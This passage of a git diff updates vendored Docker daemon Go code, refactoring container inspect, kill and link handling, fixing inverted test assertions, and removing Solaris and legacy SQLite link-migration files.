-// the container from unwanted side-effects on the rw layer.
-func Setup(initLayer string, rootUID, rootGID int) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
index e83c2751ed..035f62075f 100644
--- a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
+++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go
@@ -1,14 +1,15 @@
 // +build linux freebsd
 
-package initlayer
+package initlayer // import "github.com/docker/docker/daemon/initlayer"
 
 import (
 	"os"
 	"path/filepath"
 	"strings"
-	"syscall"
 
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
+	"golang.org/x/sys/unix"
 )
 
 // Setup populates a directory with mountpoints suitable
@@ -16,7 +17,10 @@ import (
 //
 // This extra layer is used by all containers as the top-most ro layer. It protects
 // the container from unwanted side-effects on the rw layer.
-func Setup(initLayer string, rootUID, rootGID int) error {
+func Setup(initLayerFs containerfs.ContainerFS, rootIDs idtools.IDPair) error {
+	// Since all paths are local to the container, we can just extract initLayerFs.Path()
+	initLayer := initLayerFs.Path()
+
 	for pth, typ := range map[string]string{
 		"/dev/pts":         "dir",
 		"/dev/shm":         "dir",
@@ -33,17 +37,17 @@ func Setup(initLayer string, rootUID, rootGID int) error {
 		prev := "/"
 		for _, p := range parts[1:] {
 			prev = filepath.Join(prev, p)
-			syscall.Unlink(filepath.Join(initLayer, prev))
+			unix.Unlink(filepath.Join(initLayer, prev))
 		}
 
 		if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil {
 			if os.IsNotExist(err) {
-				if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil {
+				if err := idtools.MkdirAllAndChownNew(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootIDs); err != nil {
 					return err
 				}
 				switch typ {
 				case "dir":
-					if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil {
+					if err := idtools.MkdirAllAndChownNew(filepath.Join(initLayer, pth), 0755, rootIDs); err != nil {
 						return err
 					}
 				case "file":
@@ -51,7 +55,7 @@ func Setup(initLayer string, rootUID, rootGID int) error {
 					if err != nil {
 						return err
 					}
-					f.Chown(rootUID, rootGID)
+					f.Chown(rootIDs.UID, rootIDs.GID)
 					f.Close()
 				default:
 					if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil {
diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
index 48a9d71aa5..1032092e62 100644
--- a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
+++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go
@@ -1,6 +1,9 @@
-// +build windows
+package initlayer // import "github.com/docker/docker/daemon/initlayer"
 
-package initlayer
+import (
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
+)
 
 // Setup populates a directory with mountpoints suitable
 // for bind-mounting dockerinit into the container. The mountpoint is simply an
@@ -8,6 +11,6 @@ package initlayer
 //
 // This extra layer is used by all containers as the top-most ro layer. It protects
 // the container from unwanted side-effects on the rw layer.
-func Setup(initLayer string, rootUID, rootGID int) error {
+func Setup(initLayer containerfs.ContainerFS, rootIDs idtools.IDPair) error {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go
index 557f639de1..45a2154254 100644
--- a/vendor/github.com/docker/docker/daemon/inspect.go
+++ b/vendor/github.com/docker/docker/daemon/inspect.go
@@ -1,6 +1,7 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"errors"
 	"fmt"
 	"time"
 
@@ -11,6 +12,8 @@ import (
 	"github.com/docker/docker/api/types/versions/v1p20"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/go-connections/nat"
 )
 
 // ContainerInspect returns low-level information about a
@@ -35,21 +38,22 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co
 	}
 
 	container.Lock()
-	defer container.Unlock()
 
-	base, err := daemon.getInspectData(container, size)
+	base, err := daemon.getInspectData(container)
 	if err != nil {
+		container.Unlock()
 		return nil, err
 	}
 
 	apiNetworks := make(map[string]*networktypes.EndpointSettings)
 	for name, epConf := range container.NetworkSettings.Networks {
 		if epConf.EndpointSettings != nil {
-			apiNetworks[name] = epConf.EndpointSettings
+			// We must make a copy of this pointer object otherwise it can race with other operations
+			apiNetworks[name] = epConf.EndpointSettings.Copy()
 		}
 	}
 
-	mountPoints := addMountPoints(container)
+	mountPoints := container.GetMountPoints()
 	networkSettings := &types.NetworkSettings{
 		NetworkSettingsBase: types.NetworkSettingsBase{
 			Bridge:                 container.NetworkSettings.Bridge,
@@ -57,7 +61,6 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co
 			HairpinMode:            container.NetworkSettings.HairpinMode,
 			LinkLocalIPv6Address:   container.NetworkSettings.LinkLocalIPv6Address,
 			LinkLocalIPv6PrefixLen: container.NetworkSettings.LinkLocalIPv6PrefixLen,
-			Ports:                  container.NetworkSettings.Ports,
 			SandboxKey:             container.NetworkSettings.SandboxKey,
 			SecondaryIPAddresses:   container.NetworkSettings.SecondaryIPAddresses,
 			SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses,
@@ -66,6 +69,20 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co
 		Networks:               apiNetworks,
 	}
 
+	ports := make(nat.PortMap, len(container.NetworkSettings.Ports))
+	for k, pm := range container.NetworkSettings.Ports {
+		ports[k] = pm
+	}
+	networkSettings.NetworkSettingsBase.Ports = ports
+
+	container.Unlock()
+
+	if size {
+		sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(base.ID)
+		base.SizeRw = &sizeRw
+		base.SizeRootFs = &sizeRootFs
+	}
+
 	return &types.ContainerJSON{
 		ContainerJSONBase: base,
 		Mounts:            mountPoints,
@@ -84,12 +101,12 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er
 	container.Lock()
 	defer container.Unlock()
 
-	base, err := daemon.getInspectData(container, false)
+	base, err := daemon.getInspectData(container)
 	if err != nil {
 		return nil, err
 	}
 
-	mountPoints := addMountPoints(container)
+	mountPoints := container.GetMountPoints()
 	config := &v1p20.ContainerConfig{
 		Config:          container.Config,
 		MacAddress:      container.Config.MacAddress,
@@ -107,7 +124,7 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er
 	}, nil
 }
 
-func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) {
+func (daemon *Daemon) getInspectData(container *container.Container) (*types.ContainerJSONBase, error) {
 	// make a copy to play with
 	hostConfig := *container.HostConfig
 
@@ -123,7 +140,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool)
 	var containerHealth *types.Health
 	if container.State.Health != nil {
 		containerHealth = &types.Health{
-			Status:        container.State.Health.Status,
+			Status:        container.State.Health.Status(),
 			FailingStreak: container.State.Health.FailingStreak,
 			Log:           append([]*types.HealthcheckResult{}, container.State.Health.Log...),
 		}
@@ -138,7 +155,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool)
 		Dead:       container.State.Dead,
 		Pid:        container.State.Pid,
 		ExitCode:   container.State.ExitCode(),
-		Error:      container.State.Error(),
+		Error:      container.State.ErrorMsg,
 		StartedAt:  container.State.StartedAt.Format(time.RFC3339Nano),
 		FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano),
 		Health:     containerHealth,
@@ -155,35 +172,36 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool)
 		Name:         container.Name,
 		RestartCount: container.RestartCount,
 		Driver:       container.Driver,
+		Platform:     container.OS,
 		MountLabel:   container.MountLabel,
 		ProcessLabel: container.ProcessLabel,
 		ExecIDs:      container.GetExecIDs(),
 		HostConfig:   &hostConfig,
 	}
 
-	var (
-		sizeRw     int64
-		sizeRootFs int64
-	)
-	if size {
-		sizeRw, sizeRootFs = daemon.getSize(container)
-		contJSONBase.SizeRw = &sizeRw
-		contJSONBase.SizeRootFs = &sizeRootFs
-	}
-
 	// Now set any platform-specific fields
 	contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase)
 
 	contJSONBase.GraphDriver.Name = container.Driver
 
+	if container.RWLayer == nil {
+		if container.Dead {
+			return contJSONBase, nil
+		}
+		return nil, errdefs.System(errors.New("RWLayer of container " + container.ID + " is unexpectedly nil"))
+	}
+
 	graphDriverData, err := container.RWLayer.Metadata()
 	// If container is marked as Dead, the container's graphdriver metadata
 	// could have been removed, it will cause error if we try to get the metadata,
 	// we can ignore the error if the container is dead.
-	if err != nil && !container.Dead {
-		return nil, err
+	if err != nil {
+		if !container.Dead {
+			return nil, errdefs.System(err)
+		}
+	} else {
+		contJSONBase.GraphDriver.Data = graphDriverData
 	}
-	contJSONBase.GraphDriver.Data = graphDriverData
 
 	return contJSONBase, nil
 }
@@ -191,9 +209,13 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool)
 // ContainerExecInspect returns low-level information about the exec
 // command. An error is returned if the exec cannot be found.
 func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) {
-	e, err := daemon.getExecConfig(id)
-	if err != nil {
-		return nil, err
+	e := daemon.execCommands.Get(id)
+	if e == nil {
+		return nil, errExecNotFound(id)
+	}
+
+	if container := daemon.containers.Get(e.ContainerID); container == nil {
+		return nil, errExecNotFound(id)
 	}
 
 	pc := inspectExecProcessConfig(e)
@@ -213,19 +235,6 @@ func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, err
 	}, nil
 }
 
-// VolumeInspect looks up a volume by name. An error is returned if
-// the volume cannot be found.
-func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) {
-	v, err := daemon.volumes.Get(name)
-	if err != nil {
-		return nil, err
-	}
-	apiV := volumeToAPIType(v)
-	apiV.Mountpoint = v.Path()
-	apiV.Status = v.Status()
-	return apiV, nil
-}
-
 func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings {
 	result := &v1p20.NetworkSettings{
 		NetworkSettingsBase: types.NetworkSettingsBase{
diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_linux.go
similarity index 78%
rename from vendor/github.com/docker/docker/daemon/inspect_unix.go
rename to vendor/github.com/docker/docker/daemon/inspect_linux.go
index 08a82235ad..77a4c44d79 100644
--- a/vendor/github.com/docker/docker/daemon/inspect_unix.go
+++ b/vendor/github.com/docker/docker/daemon/inspect_linux.go
@@ -1,6 +1,4 @@
-// +build !windows,!solaris
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/api/types"
@@ -30,7 +28,7 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON,
 	container.Lock()
 	defer container.Unlock()
 
-	base, err := daemon.getInspectData(container, false)
+	base, err := daemon.getInspectData(container)
 	if err != nil {
 		return nil, err
 	}
@@ -64,23 +62,6 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON,
 	}, nil
 }
 
-func addMountPoints(container *container.Container) []types.MountPoint {
-	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
-	for _, m := range container.MountPoints {
-		mountPoints = append(mountPoints, types.MountPoint{
-			Type:        m.Type,
-			Name:        m.Name,
-			Source:      m.Path(),
-			Destination: m.Destination,
-			Driver:      m.Driver,
-			Mode:        m.Mode,
-			RW:          m.RW,
-			Propagation: m.Propagation,
-		})
-	}
-	return mountPoints
-}
-
 func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig {
 	return &backend.ExecProcessConfig{
 		Tty:        e.Tty,
diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go
deleted file mode 100644
index 0e3dcc1119..0000000000
--- a/vendor/github.com/docker/docker/daemon/inspect_solaris.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/backend"
-	"github.com/docker/docker/api/types/versions/v1p19"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/daemon/exec"
-)
-
-// This sets platform-specific fields
-func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase {
-	return contJSONBase
-}
-
-// containerInspectPre120 get containers for pre 1.20 APIs.
-func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) {
-	return &v1p19.ContainerJSON{}, nil
-}
-
-func addMountPoints(container *container.Container) []types.MountPoint {
-	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
-	for _, m := range container.MountPoints {
-		mountPoints = append(mountPoints, types.MountPoint{
-			Name:        m.Name,
-			Source:      m.Path(),
-			Destination: m.Destination,
-			Driver:      m.Driver,
-			RW:          m.RW,
-		})
-	}
-	return mountPoints
-}
-
-func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig {
-	return &backend.ExecProcessConfig{
-		Tty:        e.Tty,
-		Entrypoint: e.Entrypoint,
-		Arguments:  e.Args,
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/inspect_test.go b/vendor/github.com/docker/docker/daemon/inspect_test.go
new file mode 100644
index 0000000000..f402a7af99
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/inspect_test.go
@@ -0,0 +1,33 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/daemon/exec"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestGetInspectData(t *testing.T) {
+	c := &container.Container{
+		ID:           "inspect-me",
+		HostConfig:   &containertypes.HostConfig{},
+		State:        container.NewState(),
+		ExecCommands: exec.NewStore(),
+	}
+
+	d := &Daemon{
+		linkIndex:   newLinkIndex(),
+		configStore: &config.Config{},
+	}
+
+	_, err := d.getInspectData(c)
+	assert.Check(t, is.ErrorContains(err, ""))
+
+	c.Dead = true
+	_, err = d.getInspectData(c)
+	assert.Check(t, err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go b/vendor/github.com/docker/docker/daemon/inspect_windows.go
index b331c83ca3..12fda670df 100644
--- a/vendor/github.com/docker/docker/daemon/inspect_windows.go
+++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/api/types"
@@ -12,21 +12,6 @@ func setPlatformSpecificContainerFields(container *container.Container, contJSON
 	return contJSONBase
 }
 
-func addMountPoints(container *container.Container) []types.MountPoint {
-	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
-	for _, m := range container.MountPoints {
-		mountPoints = append(mountPoints, types.MountPoint{
-			Type:        m.Type,
-			Name:        m.Name,
-			Source:      m.Path(),
-			Destination: m.Destination,
-			Driver:      m.Driver,
-			RW:          m.RW,
-		})
-	}
-	return mountPoints
-}
-
 // containerInspectPre120 get containers for pre 1.20 APIs.
 func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) {
 	return daemon.ContainerInspectCurrent(name, false)
diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go
index 055d488a5d..946eaaab1c 100644
--- a/vendor/github.com/docker/docker/daemon/keys.go
+++ b/vendor/github.com/docker/docker/daemon/keys.go
@@ -1,6 +1,6 @@
 // +build linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go
index b17255940a..2ccdb576d7 100644
--- a/vendor/github.com/docker/docker/daemon/keys_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go
@@ -1,8 +1,8 @@
 // +build !linux
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
-// ModifyRootKeyLimit is an noop on unsupported platforms.
+// ModifyRootKeyLimit is a noop on unsupported platforms.
 func ModifyRootKeyLimit() error {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go
index 18d5bbb4e5..5034c4df39 100644
--- a/vendor/github.com/docker/docker/daemon/kill.go
+++ b/vendor/github.com/docker/docker/daemon/kill.go
@@ -1,15 +1,18 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"runtime"
-	"strings"
 	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/container"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/libcontainerd"
 	"github.com/docker/docker/pkg/signal"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 type errNoSuchProcess struct {
@@ -21,6 +24,8 @@ func (e errNoSuchProcess) Error() string {
 	return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal)
 }
 
+func (errNoSuchProcess) NotFound() {}
+
 // isErrNoSuchProcess returns true if the error
 // is an instance of errNoSuchProcess.
 func isErrNoSuchProcess(err error) bool {
@@ -54,30 +59,30 @@ func (daemon *Daemon) ContainerKill(name string, sig uint64) error {
 // to send the signal. An error is returned if the container is paused
 // or not running, or if there is a problem returned from the
 // underlying kill command.
-func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error {
+func (daemon *Daemon) killWithSignal(container *containerpkg.Container, sig int) error {
 	logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID)
 	container.Lock()
 	defer container.Unlock()
 
-	// We could unpause the container for them rather than returning this error
-	if container.Paused {
-		return fmt.Errorf("Container %s is paused. Unpause the container before stopping", container.ID)
-	}
+	daemon.stopHealthchecks(container)
 
 	if !container.Running {
-		return errNotRunning{container.ID}
+		return errNotRunning(container.ID)
 	}
 
-	if container.Config.StopSignal != "" {
+	var unpause bool
+	if container.Config.StopSignal != "" && syscall.Signal(sig) != syscall.SIGKILL {
 		containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal)
 		if err != nil {
 			return err
 		}
 		if containerStopSignal == syscall.Signal(sig) {
 			container.ExitOnNext()
+			unpause = container.Paused
 		}
 	} else {
 		container.ExitOnNext()
+		unpause = container.Paused
 	}
 
 	if !daemon.IsShuttingDown() {
@@ -92,13 +97,18 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er
 	}
 
 	if err := daemon.kill(container, sig); err != nil {
-		err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err)
-		// if container or process not exists, ignore the error
-		if strings.Contains(err.Error(), "container not found") ||
-			strings.Contains(err.Error(), "no such process") {
-			logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error())
+		if errdefs.IsNotFound(err) {
+			unpause = false
+			logrus.WithError(err).WithField("container", container.ID).WithField("action", "kill").Debug("container kill failed because of 'container not found' or 'no such process'")
 		} else {
-			return err
+			return errors.Wrapf(err, "Cannot kill container %s", container.ID)
+		}
+	}
+
+	if unpause {
+		// above kill signal will be sent once resume is finished
+		if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil {
+			logrus.Warn("Cannot unpause container %s: %s", container.ID, err)
 		}
 	}
 
@@ -110,16 +120,16 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er
 }
 
 // Kill forcefully terminates a container.
-func (daemon *Daemon) Kill(container *container.Container) error {
+func (daemon *Daemon) Kill(container *containerpkg.Container) error {
 	if !container.IsRunning() {
-		return errNotRunning{container.ID}
+		return errNotRunning(container.ID)
 	}
 
 	// 1. Send SIGKILL
 	if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil {
 		// While normally we might "return err" here we're not going to
 		// because if we can't stop the container by this point then
-		// its probably because its already stopped. Meaning, between
+		// it's probably because it's already stopped. Meaning, between
 		// the time of the IsRunning() call above and now it stopped.
 		// Also, since the err return will be environment specific we can't
 		// look for any particular (common) error that would indicate
@@ -131,7 +141,10 @@ func (daemon *Daemon) Kill(container *container.Container) error {
 			return nil
 		}
 
-		if _, err2 := container.WaitStop(2 * time.Second); err2 != nil {
+		ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+		defer cancel()
+
+		if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil {
 			return err
 		}
 	}
@@ -144,14 +157,17 @@ func (daemon *Daemon) Kill(container *container.Container) error {
 		return err
 	}
 
-	container.WaitStop(-1 * time.Second)
+	// Wait for exit with no timeout.
+	// Ignore returned status.
+	<-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning)
+
 	return nil
 }
 
 // killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error.
-func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error {
+func (daemon *Daemon) killPossiblyDeadProcess(container *containerpkg.Container, sig int) error {
 	err := daemon.killWithSignal(container, sig)
-	if err == syscall.ESRCH {
+	if errdefs.IsNotFound(err) {
 		e := errNoSuchProcess{container.GetPID(), sig}
 		logrus.Debug(e)
 		return e
@@ -159,6 +175,6 @@ func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, si
 	return err
 }
 
-func (daemon *Daemon) kill(c *container.Container, sig int) error {
-	return daemon.containerd.Signal(c.ID, sig)
+func (daemon *Daemon) kill(c *containerpkg.Container, sig int) error {
+	return daemon.containerd.SignalProcess(context.Background(), c.ID, libcontainerd.InitProcessName, sig)
 }
diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go
index 7f691d4f16..1639572fa8 100644
--- a/vendor/github.com/docker/docker/daemon/links.go
+++ b/vendor/github.com/docker/docker/daemon/links.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"sync"
@@ -76,12 +76,16 @@ func (l *linkIndex) parents(child *container.Container) map[string]*container.Co
 }
 
 // delete deletes all link relationships referencing this container
-func (l *linkIndex) delete(container *container.Container) {
+func (l *linkIndex) delete(container *container.Container) []string {
 	l.mu.Lock()
-	for _, child := range l.idx[container] {
+
+	var aliases []string
+	for alias, child := range l.idx[container] {
+		aliases = append(aliases, alias)
 		delete(l.childIdx[child], container)
 	}
 	delete(l.idx, container)
 	delete(l.childIdx, container)
 	l.mu.Unlock()
+	return aliases
 }
diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go
index af15de046d..2bcb483259 100644
--- a/vendor/github.com/docker/docker/daemon/links/links.go
+++ b/vendor/github.com/docker/docker/daemon/links/links.go
@@ -1,4 +1,4 @@
-package links
+package links // import "github.com/docker/docker/daemon/links"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go
index 0273f13cf0..e1b36dbbd9 100644
--- a/vendor/github.com/docker/docker/daemon/links/links_test.go
+++ b/vendor/github.com/docker/docker/daemon/links/links_test.go
@@ -1,4 +1,4 @@
-package links
+package links // import "github.com/docker/docker/daemon/links"
 
 import (
 	"fmt"
@@ -33,7 +33,7 @@ func TestLinkNaming(t *testing.T) {
 	value, ok := env["DOCKER_1_PORT"]
 
 	if !ok {
-		t.Fatalf("DOCKER_1_PORT not found in env")
+		t.Fatal("DOCKER_1_PORT not found in env")
 	}
 
 	if value != "tcp://172.0.17.2:6379" {
@@ -192,21 +192,21 @@ func TestLinkPortRangeEnv(t *testing.T) {
 	if env["DOCKER_ENV_PASSWORD"] != "gordon" {
 		t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"])
 	}
-	for i := range []int{6379, 6380, 6381} {
+	for _, i := range []int{6379, 6380, 6381} {
 		tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i)
-		tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i)
-		tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i)
+		tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP_PORT", i)
+		tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP_PROTO", i)
 		tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i)
-		if env[tcpaddr] == "172.0.17.2" {
+		if env[tcpaddr] != "172.0.17.2" {
 			t.Fatalf("Expected env %s  = 172.0.17.2, got %s", tcpaddr, env[tcpaddr])
 		}
-		if env[tcpport] == fmt.Sprintf("%d", i) {
+		if env[tcpport] != fmt.Sprintf("%d", i) {
 			t.Fatalf("Expected env %s  = %d, got %s", tcpport, i, env[tcpport])
 		}
-		if env[tcpproto] == "tcp" {
+		if env[tcpproto] != "tcp" {
 			t.Fatalf("Expected env %s  = tcp, got %s", tcpproto, env[tcpproto])
 		}
-		if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) {
+		if env[tcp] != fmt.Sprintf("tcp://172.0.17.2:%d", i) {
 			t.Fatalf("Expected env %s  = tcp://172.0.17.2:%d, got %s", tcp, i, env[tcp])
 		}
 	}
diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go
deleted file mode 100644
index 2ea40d9e51..0000000000
--- a/vendor/github.com/docker/docker/daemon/links_linux.go
+++ /dev/null
@@ -1,72 +0,0 @@
-package daemon
-
-import (
-	"fmt"
-	"path/filepath"
-	"strings"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/pkg/graphdb"
-)
-
-// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig
-// when sqlite links were used, hostConfig.Links was set to nil
-func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error {
-	// if links is populated (or an empty slice), then this isn't using sqlite links and can be skipped
-	if container.HostConfig == nil || container.HostConfig.Links != nil {
-		return nil
-	}
-
-	logrus.Debugf("migrating legacy sqlite link info for container: %s", container.ID)
-
-	fullName := container.Name
-	if fullName[0] != '/' {
-		fullName = "/" + fullName
-	}
-
-	// don't use a nil slice, this ensures that the check above will skip once the migration has completed
-	links := []string{}
-	children, err := db.Children(fullName, 0)
-	if err != nil {
-		if !strings.Contains(err.Error(), "Cannot find child for") {
-			return err
-		}
-		// else continue... it's ok if we didn't find any children, it'll just be nil and we can continue the migration
-	}
-
-	for _, child := range children {
-		c, err := daemon.GetContainer(child.Entity.ID())
-		if err != nil {
-			return err
-		}
-
-		links = append(links, c.Name+":"+child.Edge.Name)
-	}
-
-	container.HostConfig.Links = links
-	return container.WriteHostConfig()
-}
-
-// sqliteMigration performs the link graph DB migration.
-func (daemon *Daemon) sqliteMigration(containers map[string]*container.Container) error {
-	// migrate any legacy links from sqlite
-	linkdbFile := filepath.Join(daemon.root, "linkgraph.db")
-	var (
-		legacyLinkDB *graphdb.Database
-		err          error
-	)
-
-	legacyLinkDB, err = graphdb.NewSqliteConn(linkdbFile)
-	if err != nil {
-		return fmt.Errorf("error connecting to legacy link graph DB %s, container links may be lost: %v", linkdbFile, err)
-	}
-	defer legacyLinkDB.Close()
-
-	for _, c := range containers {
-		if err := daemon.migrateLegacySqliteLinks(legacyLinkDB, c); err != nil {
-			return err
-		}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/links_linux_test.go b/vendor/github.com/docker/docker/daemon/links_linux_test.go
deleted file mode 100644
index e2dbff2d25..0000000000
--- a/vendor/github.com/docker/docker/daemon/links_linux_test.go
+++ /dev/null
@@ -1,98 +0,0 @@
-package daemon
-
-import (
-	"encoding/json"
-	"io/ioutil"
-	"os"
-	"path"
-	"path/filepath"
-	"testing"
-
-	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/pkg/graphdb"
-	"github.com/docker/docker/pkg/stringid"
-)
-
-func TestMigrateLegacySqliteLinks(t *testing.T) {
-	tmpDir, err := ioutil.TempDir("", "legacy-qlite-links-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpDir)
-
-	name1 := "test1"
-	c1 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:         stringid.GenerateNonCryptoID(),
-			Name:       name1,
-			HostConfig: &containertypes.HostConfig{},
-		},
-	}
-	c1.Root = tmpDir
-
-	name2 := "test2"
-	c2 := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   stringid.GenerateNonCryptoID(),
-			Name: name2,
-		},
-	}
-
-	store := container.NewMemoryStore()
-	store.Add(c1.ID, c1)
-	store.Add(c2.ID, c2)
-
-	d := &Daemon{root: tmpDir, containers: store}
-	db, err := graphdb.NewSqliteConn(filepath.Join(d.root, "linkgraph.db"))
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := db.Set("/"+name1, c1.ID); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := db.Set("/"+name2, c2.ID); err != nil {
-		t.Fatal(err)
-	}
-
-	alias := "hello"
-	if _, err := db.Set(path.Join(c1.Name, alias), c2.ID); err != nil {
-		t.Fatal(err)
-	}
-
